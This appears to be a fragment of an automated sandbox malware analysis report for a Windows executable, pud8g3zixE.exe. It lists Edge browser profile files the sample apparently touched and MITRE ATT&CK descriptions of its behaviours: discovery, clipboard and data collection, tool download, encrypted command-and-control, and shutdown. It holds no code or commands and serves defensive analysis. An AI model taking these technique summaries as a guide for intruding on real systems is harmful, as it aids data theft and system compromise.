C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66DAD231-810.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1bc36455-5118-45f8-8efe-db73fee6a447.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\435e1824-6fbf-4d99-84e9-dfa1b8bf6ead.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8dba3761-ed0c-4a5e-ae0e-ea6535976ba4.tmp

Windows Analysis Report
pud8g3zixE.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre